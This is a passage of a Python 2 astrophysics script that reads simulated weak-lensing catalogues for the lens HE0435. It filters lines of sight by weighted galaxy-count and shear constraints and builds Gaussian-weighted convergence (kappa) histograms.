constrwidth_weight_sup = constrwidth_mass2rms_meds_sup120\n if weightin.split('_')[1] == \"mass3rms\": constr_weight = 
constr_mass3rms_meds120; constrwidth_weight_inf = constrwidth_mass3rms_meds_inf120; constrwidth_weight_sup = constrwidth_mass3rms_meds_sup120\n if weightin.split('_')[1] == \"mass2overrrms\": constr_weight = constr_mass2overrrms_meds120; constrwidth_weight_inf = constrwidth_mass2overrrms_meds_inf120; constrwidth_weight_sup = constrwidth_mass2overrrms_meds_sup120\n if weightin.split('_')[1] == \"mass3overrrms\": constr_weight = constr_mass3overrrms_meds120; constrwidth_weight_inf = constrwidth_mass3overrrms_meds_inf120; constrwidth_weight_sup = constrwidth_mass3overrrms_meds_sup120\n if weightin.split('_')[1] == \"flexion\": constr_weight = constr_flexion_meds120; constrwidth_weight_inf = constrwidth_flexion_meds_inf120; constrwidth_weight_sup = constrwidth_flexion_meds_sup120\n if weightin.split('_')[1] == \"tidal\": constr_weight = constr_tidal_meds120; constrwidth_weight_inf = constrwidth_tidal_meds_inf120; constrwidth_weight_sup = constrwidth_tidal_meds_sup120\n if weightin.split('_')[1] == \"SIS\": constr_weight = constr_SIS_meds120; constrwidth_weight_inf = constrwidth_SIS_meds_inf120; constrwidth_weight_sup = constrwidth_SIS_meds_sup120\n if weightin.split('_')[1] == \"SIShalo\": constr_weight = constr_SIShalo_meds120; constrwidth_weight_inf = constrwidth_SIShalo_meds_inf120; constrwidth_weight_sup = constrwidth_SIShalo_meds_sup120\n if weightin.split('_')[1] == \"gamma\": constr_weight = constr_gamma; constrwidth_weight_inf = constrwidth_gamma_inf; constrwidth_weight_sup = constrwidth_gamma_sup\n return constr_weight, constrwidth_weight_inf, constrwidth_weight_sup\n\nif conjoined == 3: constr_weight3, constrwidth_weight3_inf, constrwidth_weight3_sup = declareweight(weightin3)\nif (conjoined == 2) | (conjoined == 3): constr_weight2, constrwidth_weight2_inf, constrwidth_weight2_sup = declareweight(weightin2)\nif (conjoined == 1) | (conjoined == 2) | (conjoined == 3): constr_weight1, constrwidth_weight1_inf, constrwidth_weight1_sup = declareweight(weightin1)\n\nprint \"Reading...\"\n\nif conjoined == 3:\n output = '%skappahist_HE0435_%sinnermask_nobeta%s_%s_%s_%s_%s_%s_increments%s%s%s.cat' % (rootout,innermask,handpickedstr,other,weightin1,weightin2,weightin3,mag,increment1,increment2,increment3)\nif conjoined == 1:\n output = '%skappahist_HE0435_%sinnermask_nobeta%s_%s_%s_%s_increments%s_unbias%s_gamma%s.cat' % (rootout,innermask,handpickedstr,other,weightin1,mag,increment1,unbias,constr_gamma)\n\ndef readfile(file,usecols):\n f = fitsio.FITS(file)\n print f # I need to print it, or f.hdu_list will not read\n ext = len(f.hdu_list)\n for i in range(ext - 1):\n if i == 0:\n data = fitsio.read(file, columns=usecols, ext=i+1)\n else:\n data = np.r_[data,fitsio.read(file, columns=usecols, ext=i+1)]\n # for speed, fitsio always returns columns and rows in order, so for instance in [1,2,3] even when usecols=[2,3,1]\n sort = np.argsort(np.argsort(usecols))\n if len(usecols) == 1:\n return data[data.dtype.names[0]]\n if len(usecols) == 2:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]]\n if len(usecols) == 3:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]]\n if len(usecols) == 4:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]]\n if len(usecols) == 5:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]]\n if 
len(usecols) == 6:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]]\n if len(usecols) == 7:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]],data[data.dtype.names[sort[6]]]\n if len(usecols) == 8:\n return data[data.dtype.names[sort[0]]],data[data.dtype.names[sort[1]]],data[data.dtype.names[sort[2]]],data[data.dtype.names[sort[3]]],data[data.dtype.names[sort[4]]],data[data.dtype.names[sort[5]]],data[data.dtype.names[sort[6]]],data[data.dtype.names[sort[7]]]\n\ndef readconjoined1_ugriz(radius,weight1_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup):\n ''' Here I only read the columns of interest, without kappa, for ugriz, in order to find the medians of their values over the whole MS.'''\n if only8 == True: field = 1\n else: field = 8\n med1 = np.zeros(field)\n filters1 = \"ugriz\"\n for j in range(field):\n for i in range(8):\n if type(weight1_index) == int:\n weight1_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=[weight1_index])\n if i == 0:\n weight1 = weight1_\n else:\n weight1 = np.append(weight1,weight1_)\n else:\n weight1_1_,weight1_2_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=[2,3])\n if i == 0:\n weight1_1 = weight1_1_\n weight1_2 = weight1_2_\n else:\n weight1_1 = np.append(weight1_1,weight1_1_)\n weight1_2 = np.append(weight1_2,weight1_2_)\n #print j,i\n if type(weight1_index) == int:\n med1[j] = np.median(weight1)\n else:\n med1[j] = np.median(np.sqrt(weight1_1**2 + weight1_2**2))\n med_weight1 = np.mean(med1) # throughout the code I use med_weight1 when computing intervals, following Green et al. For this, weight1 should always refer to simple galaxy number counts\n if type(weight1_index) != int:\n constr_weight1 = constr_weight1 / med_weight1 # for gamma, measured shear divided by the median value of shear in MS; this turns it into an overdensity, like the other weights, so that it is meaningful to multiply later by the median number of galaxies\n constrwidth_weight1_inf = constrwidth_weight1_inf / med_weight1\n constrwidth_weight1_sup = constrwidth_weight1_sup / med_weight1\n E_w1_inf = np.max([1, round(35 * (constr_weight1 - constrwidth_weight1_inf))]) # absolute number, e.g. 
of galaxies within the lower width; med_weight1=35 for N_gal\n E_w1_sup = np.max([1, round(35 * (-constr_weight1 + constrwidth_weight1_sup))])\n return constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,med_weight1,E_w1_inf,E_w1_sup\n\ndef readconjoined3_ugriz(radius,weight1_index,weight2_index,weight3_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup):\n if only8 == True: field = 1\n else: field = 8\n med1 = np.zeros(field)\n med2 = np.zeros(field)\n med3 = np.zeros(field)\n filters1 = \"ugriz\"\n for j in range(field):\n for i in range(8):\n if type(weight2_index) == int:\n weight1_,weight2_,weight3_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(weight1_index,weight2_index,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n else:\n weight1_,weight2_1_,weight2_2_,weight3_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(weight1_index,2,3,weight3_index))\n if i == 0:\n weight1 = weight1_\n weight2_1 = weight2_1_\n weight2_2 = weight2_2_\n weight3 = weight3_\n else:\n weight1 = np.append(weight1,weight1_)\n weight2_1 = np.append(weight2_1,weight2_1_)\n weight2_2 = np.append(weight2_2,weight2_2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n if type(weight2_index) == int:\n med1[j] = np.median(weight1)\n med2[j] = np.median(weight2)\n med3[j] = np.median(weight3)\n else:\n med1[j] = np.median(weight1)\n med2[j] = np.median(np.sqrt(weight2_1**2 + weight2_2**2))\n med3[j] = np.median(weight3)\n med_weight1 = np.mean(med1)\n med_weight2 = np.mean(med2)\n med_weight3 = np.mean(med3)\n if type(weight2_index) != int:\n constr_weight2 = constr_weight2 / med_weight2\n constrwidth_weight2_inf = constrwidth_weight2_inf / med_weight2\n constrwidth_weight2_sup = constrwidth_weight2_sup / med_weight2\n E_w1_inf = np.max([1, round(med_weight1 * (constr_weight1 - constrwidth_weight1_inf))])\n E_w1_sup = np.max([1, round(med_weight1 * (-constr_weight1 + constrwidth_weight1_sup))])\n E_w2_inf = np.max([1, round(med_weight1 * (constr_weight2 - constrwidth_weight2_inf))])\n E_w2_sup = np.max([1, round(med_weight1 * (-constr_weight2 + constrwidth_weight2_sup))])\n E_w3_inf = np.max([1, round(med_weight1 * (constr_weight3 - constrwidth_weight3_inf))])\n E_w3_sup = np.max([1, round(med_weight1 * (-constr_weight3 + constrwidth_weight3_sup))])\n return constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup\n\ndef readconjoined1_ugrizJHK(radius,weight1_index,constr_weight1,increment1,med_weight1,E_w1_inf,E_w1_sup):\n ''' Here I read ugrizJHK, converting weighted counts into overdensities, and recording the kappa values only for overdensities satisfying the constraint. 
I consider the full range of the constraint.'''\n filters1 = filters\n if only8 == True: field = 1\n else: field = 8\n for j in range(field):\n for i in range(8):\n if type(weight1_index) == int:\n id_,kappa_, weight1_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,weight1_index))\n weight1_ = weight1_ / med_weight1\n else:\n id_,kappa_, gamma1_,gamma2_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = gamma / med_weight1\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n id_ = id_[(weight * 35 >= round(constr_weight1 * 35) - limsigma * E_w1_inf - increment1/2.0) & (weight * 35 < round(constr_weight1 * 35) + limsigma * E_w1_sup + increment1/2.0) ]\n kappa_ = kappa_[(weight * 35 >= round(constr_weight1 * 35) - limsigma * E_w1_inf - increment1/2.0) & (weight * 35 < round(constr_weight1 * 35) + limsigma * E_w1_sup + increment1/2.0) ] # convert overdensities into absolute counts\n weight1_ = weight1_[(weight * 35 >= round(constr_weight1 * 35) - limsigma * E_w1_inf - increment1/2.0) & (weight * 35 < round(constr_weight1 * 35) + limsigma * E_w1_sup + increment1/2.0) ]\n print np.shape(kappa_)\n del weight\n if (i == 0) and (j == 0):\n id = id_\n kappa = kappa_\n weight1 = weight1_\n ind1 = np.ones(np.shape(id_)) * j # this is to record the field name, and will be used together with id when matching different apertures\n ind2 = np.ones(np.shape(id_)) * i\n else:\n id = np.append(id,id_)\n ind1 = np.append(ind1,np.ones(np.shape(id_)) * j)\n ind2 = np.append(ind2,np.ones(np.shape(id_)) * i)\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n #print j,i\n return id,ind1,ind2,kappa,weight1\n\ndef readconjoined3_ugrizJHK(radius,weight1_index,weight2_index,weight3_index,constr_weight1,constr_weight2,constr_weight3,increment1,increment2,increment3,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup):\n filters1 = filters\n if only8 == True: field = 1\n else: field = 8\n for j in range(field):\n for i in range(8):\n if type(weight2_index) == int:\n id_,kappa_, weight1_,weight2_,weight3_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,weight1_index,weight2_index,weight3_index))\n weight1_ = weight1_ / med_weight1\n weight2_ = weight2_ / med_weight2\n weight3_ = weight3_ / med_weight3\n else:\n id_,kappa_, weight1_,weight3_,gamma1_,gamma2_ = readfile(\"%snobetaave3435NEWMEASUREDmedinject_%s_%s_GGL_los_8_%s_%s_%s.fits\" % (root,filters1,lens,str(j),str(i),radius), usecols=(0,1,weight1_index,weight3_index,2,3))\n gamma1 = gamma1_\n gamma2 = gamma2_\n gamma = gamma1 # just so that the array has the correct shape\n gamma = np.sqrt(gamma1**2 + gamma2**2)\n weight1_ = weight1_ / med_weight1\n weight2_ = gamma / med_weight2\n weight3_ = weight3_ / med_weight3\n weight = np.copy(weight1_)\n print np.shape(kappa_)\n id_ = id_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * 
E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight1 * med_weight1) - limsigma * E_w1_inf - increment1/2.0) & (weight * med_weight1 < round(constr_weight1 * med_weight1) + limsigma * E_w1_sup + increment1/2.0) ]\n print np.shape(kappa_)\n del weight\n weight = np.copy(weight2_)\n id_ = id_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight2 * med_weight1) - limsigma * E_w2_inf - increment2/2.0) & (weight * med_weight1 < round(constr_weight2 * med_weight1) + limsigma * E_w2_sup + increment2/2.0) ]\n print np.shape(kappa_)\n del weight\n weight = np.copy(weight3_)\n id_ = id_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n kappa_ = kappa_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight1_ = weight1_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight2_ = weight2_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n weight3_ = weight3_[(weight * med_weight1 >= round(constr_weight3 * med_weight1) - limsigma * E_w3_inf - increment3/2.0) & (weight * med_weight1 < round(constr_weight3 * med_weight1) + limsigma * E_w3_sup + increment3/2.0) ]\n print np.shape(kappa_)\n del weight\n if (i == 0) and (j == 0):\n id = id_\n kappa = kappa_\n weight1 = weight1_\n weight2 = weight2_\n weight3 = weight3_\n ind1 = np.ones(np.shape(id_)) * j\n ind2 = np.ones(np.shape(id_)) * i\n else:\n id = np.append(id,id_)\n ind1 = np.append(ind1,np.ones(np.shape(id_)) * j)\n ind2 = np.append(ind2,np.ones(np.shape(id_)) * 
i)\n kappa = np.append(kappa,kappa_)\n weight1 = np.append(weight1,weight1_)\n weight2 = np.append(weight2,weight2_)\n weight3 = np.append(weight3,weight3_)\n #print j,i\n return id,ind1,ind2,kappa,weight1,weight2,weight3\n\nif conjoined == 1:\n constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,med_weight1,E_w1_inf,E_w1_sup = readconjoined1_ugriz(weightin1.split('_')[0],weight1_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup) # the constr argument representing 'gamma' (if 'gamma' is used) needs to be used here, so that it can be updated by the code. In addition, all constr arguments must be used because, as I am using multiple radii, global arguments such as constr_weight1 for one radius will correspond to a different global argument for another radius\n id,ind1,ind2,kappa,weight1 = readconjoined1_ugrizJHK(weightin1.split('_')[0],weight1_index,constr_weight1,increment1,med_weight1,E_w1_inf,E_w1_sup)\n del id,ind1,ind2\n\nif conjoined == 3:\n if (weightin1.split('_')[0] == weightin2.split('_')[0]) and (weightin2.split('_')[0] == weightin3.split('_')[0]):\n constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup = readconjoined3_ugriz(weightin1.split('_')[0],weight1_index,weight2_index,weight3_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup)\n id,ind1,ind2,kappa,weight1,weight2,weight3 = readconjoined3_ugrizJHK(weightin1.split('_')[0],weight1_index,weight2_index,weight3_index,constr_weight1,constr_weight2,constr_weight3,increment1,increment2,increment3,med_weight1,med_weight2,med_weight3,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup)\n del id,ind1,ind2\n else:\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,med_weight1,med_weight2,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup = readconjoined2_ugriz(weightin1.split('_')[0],weight1_index,weight2_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup)\n id_rad1,ind1_rad1,ind2_rad1,kappa_rad1,weight1_,weight2_ = readconjoined2_ugrizJHK(weightin1.split('_')[0],weight1_index,weight2_index,constr_weight1,constr_weight2,increment1,increment2,med_weight1,med_weight2,E_w1_inf,E_w1_sup,E_w2_inf,E_w2_sup)\n constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup,med_weight3,E_w3_inf,E_w3_sup = readconjoined1_ugriz(weightin3.split('_')[0],weight3_index,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup)\n id_rad2,ind1_rad2,ind2_rad2,kappa_rad2,weight3_ = readconjoined1_ugrizJHK(weightin3.split('_')[0],weight3_index,constr_weight3,increment3,med_weight3,E_w3_inf,E_w3_sup)\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup,med_weight1,E_w1_inf,E_w1_sup = readconjoined1_ugriz(weightin1.split('_')[0],weight1_index,constr_weight1,constrwidth_weight1_inf,constrwidth_weight1_sup)\n id_rad1,ind1_rad1,ind2_rad1,kappa_rad1,weight1_ = readconjoined1_ugrizJHK(weightin1.split('_')[0],weight1_index,constr_weight1,increment1,med_weight1,E_w1_inf,E_w1_sup)\n constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup,med_weight2,med_weight3,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup = 
readconjoined2_ugriz(weightin2.split('_')[0],weight2_index,weight3_index,constr_weight2,constrwidth_weight2_inf,constrwidth_weight2_sup,constr_weight3,constrwidth_weight3_inf,constrwidth_weight3_sup)\n id_rad2,ind1_rad2,ind2_rad2,kappa_rad2,weight2_,weight3_ = readconjoined2_ugrizJHK(weightin2.split('_')[0],weight2_index,weight3_index,constr_weight2,constr_weight3,increment2,increment3,med_weight2,med_weight3,E_w2_inf,E_w2_sup,E_w3_inf,E_w3_sup)\n if only8 == True: field = 1\n else: field = 8\n for j in range(field):\n for i in range(8):\n id_rad1_ij = id_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n id_rad2_ij = id_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n ind1_rad1_ij = ind1_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n ind1_rad2_ij = ind1_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n ind2_rad1_ij = ind2_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n ind2_rad2_ij = ind2_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n kappa_rad1_ij = kappa_rad1[(ind1_rad1 == j) & (ind2_rad1 == i)]\n kappa_rad2_ij = kappa_rad2[(ind1_rad2 == j) & (ind2_rad2 == i)]\n weight1_ij = weight1_[(ind1_rad1 == j) & (ind2_rad1 == i)]\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n weight2_ij = weight2_[(ind1_rad1 == j) & (ind2_rad1 == i)]\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n weight2_ij = weight2_[(ind1_rad2 == j) & (ind2_rad2 == i)]\n weight3_ij = weight3_[(ind1_rad2 == j) & (ind2_rad2 == i)]\n\n ind1_rad2_ij = ind1_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n ind2_rad2_ij = ind2_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n kappa_rad2_ij = kappa_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n weight2_ij = weight2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n weight3_ij = weight3_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n id_rad2_ij = id_rad2_ij[np.where(np.in1d(id_rad2_ij, id_rad1_ij))[0]]\n\n ind1_rad1_ij = ind1_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n ind2_rad1_ij = ind2_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n kappa_rad1_ij = kappa_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n weight1_ij = weight1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n weight2_ij = weight2_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n id_rad1_ij = id_rad1_ij[np.where(np.in1d(id_rad1_ij, id_rad2_ij))[0]]\n\n sort1 = np.argsort(id_rad1_ij)\n kappa_rad1_ij = kappa_rad1_ij[sort1]\n weight1_ij = weight1_ij[sort1]\n sort2 = np.argsort(id_rad2_ij)\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n weight2_ij = weight2_ij[sort2]\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n weight2_ij = weight2_ij[sort1]\n weight3_ij = weight3_ij[sort2]\n kappa_rad2_ij = kappa_rad2_ij[sort2]\n\n diff = kappa_rad1_ij - kappa_rad2_ij\n if diff.any()!=0: print \"error kappa\" # testing sanity\n\n if (i == 0) and (j == 0):\n kappa = kappa_rad1_ij\n weight1 = weight1_ij\n weight2 = weight2_ij\n weight3 = weight3_ij\n else:\n kappa = np.append(kappa,kappa_rad1_ij)\n weight1 = np.append(weight1,weight1_ij)\n weight2 = np.append(weight2,weight2_ij)\n weight3 = np.append(weight3,weight3_ij)\n del sort1,sort2\n del weight1_ij,weight1_\n del weight2_ij,weight2_\n del weight3_ij,weight3_\n del id_rad1_ij,id_rad1\n del id_rad2_ij,id_rad2\n del ind1_rad1_ij,ind1_rad1\n del ind1_rad2_ij,ind1_rad2\n del ind2_rad1_ij,ind2_rad1\n del ind2_rad2_ij,ind2_rad2\n del kappa_rad1_ij,kappa_rad1\n del kappa_rad2_ij,kappa_rad2\n\nprint(\" Read in 
%s seconds\" % (time.time() - start_time))\n\ngauss = sp.stats.norm(0, 1)\nstart1 = time.time()\nLOS = 0\nprint np.shape(kappa)\n\nif conjoined == 3:\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n for E2 in np.arange(-limsigma * E_w2_inf, limsigma * E_w2_sup + 1, increment2):\n for E3 in np.arange(-limsigma * E_w3_inf, limsigma * E_w3_sup + 1, increment3):\n print \"E1 = \", E1, \"in (\", -limsigma * E_w1_inf, \",\", limsigma * E_w1_sup, \") \", \"E2 = \", E2, \"in (\", -limsigma * E_w2_inf, \",\", limsigma * E_w2_sup, \") \", \"E3 = \", E3, \"in (\", -limsigma * E_w3_inf, \",\", limsigma * E_w3_sup, \") \"#, \"gauss_weight4 = \", gauss.pdf(float(E4)/E_w4)\n if (weightin1.split('_')[0] == weightin2.split('_')[0]) and (weightin2.split('_')[0] == weightin3.split('_')[0]):\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight1 >= round(constr_weight3 * med_weight1) + E3 - increment3/2.0) & (weight3 * med_weight1 < round(constr_weight3 * med_weight1) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n else:\n if weightin1.split('_')[0] == weightin2.split('_')[0]:\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight1 >= round(constr_weight2 * med_weight1) + E2 - increment2/2.0) & (weight2 * med_weight1 < round(constr_weight2 * med_weight1) + E2 + increment2/2.0) & (weight3 * med_weight3 >= round(constr_weight3 * med_weight3) + E3 - increment3/2.0) & (weight3 * med_weight3 < round(constr_weight3 * med_weight3) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if weightin2.split('_')[0] == weightin3.split('_')[0]:\n data = kappa[(weight1 * med_weight1 >= round(constr_weight1 * med_weight1) + E1 - increment1/2.0) & (weight1 * med_weight1 < round(constr_weight1 * med_weight1) + E1 + increment1/2.0) & (weight2 * med_weight2 >= round(constr_weight2 * med_weight2) + E2 - increment2/2.0) & (weight2 * med_weight2 < round(constr_weight2 * med_weight2) + E2 + increment2/2.0) & (weight3 * med_weight2 >= round(constr_weight3 * med_weight2) + E3 - increment3/2.0) & (weight3 * med_weight2 < round(constr_weight3 * med_weight2) + E3 + increment3/2.0)] # this is equation 3 in Greene et al.\n if data.size > 0:\n if E1 < 0: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_inf)\n else: gauss_factorE1 = gauss.pdf(float(E1)/E_w1_sup)\n if E2 < 0: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_inf)\n else: gauss_factorE2 = gauss.pdf(float(E2)/E_w2_sup)\n if E3 < 0: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_inf)\n else: gauss_factorE3 = gauss.pdf(float(E3)/E_w3_sup)\n kappa_constrained = np.histogram(data, bins = bin_stat, range=(min_kappa,max_kappa))[0].astype(float) * gauss_factorE1 * gauss_factorE2 * gauss_factorE3 / data.shape[0]\n if LOS == 0:\n unbiased_kappa_constrained = kappa_constrained\n else:\n unbiased_kappa_constrained = unbiased_kappa_constrained + kappa_constrained\n LOS = LOS + data.size\n\nif conjoined == 1:\n med_weight1 = 35 # determined from N_gal\n for E1 in np.arange(-limsigma * E_w1_inf, limsigma * E_w1_sup + 1, increment1):\n print \"E1 = \", E1, \"in (\", -limsigma * 
